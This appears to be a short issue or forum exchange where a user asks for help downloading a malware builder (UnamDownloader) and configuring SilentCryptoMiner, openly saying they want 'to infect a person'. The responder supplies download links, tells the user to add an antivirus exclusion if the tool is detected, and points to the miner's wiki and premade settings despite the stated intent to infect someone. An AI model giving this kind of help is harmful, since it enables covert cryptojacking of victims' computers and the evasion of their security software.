I need help to download the file and be able to use the application please I did it and a step by step tutorial was deleted

You mean help to download the builder? Just download it here: https://github.com/UnamSanctam/UnamDownloader/releases and run it, if it gets detected by the antivirus then you'll need to add an exclusion to where you download it.

I was able to install it, now I want to know how I can configure SilentCryptoMiner and be able to infect a person

You can find the wiki for the SilentCryptoMiner here: https://github.com/UnamSanctam/SilentCryptoMiner/wiki, there are also some premade example settings there that you can base things upon.
